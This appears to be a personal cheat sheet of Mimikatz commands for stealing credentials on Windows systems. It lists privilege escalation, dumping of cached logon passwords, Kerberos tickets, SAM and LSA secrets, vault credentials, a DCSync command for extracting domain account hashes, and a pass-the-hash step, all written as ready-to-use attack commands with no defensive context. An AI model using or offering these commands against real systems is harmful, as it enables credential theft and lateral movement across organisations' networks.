Use "privilege::debug" and "token::elevate" before dumping things!!!!
Dumping cached AD credentials -
sekurlsa::logonpasswords
sekurlsa::tickets
Dumping local credentials -
lsadump::sam
lsadump::secrets
Dumping vault creds -
vault::cred
Dumping creds via DCSync -
For <domain>, provide the short name, e.g. "corp" if the domain is "corp.com".
lsadump::dcsync /user:<domain>\<user>
Pass the Hash attack -
Check Notion for the whole command.
sekurlsa::pth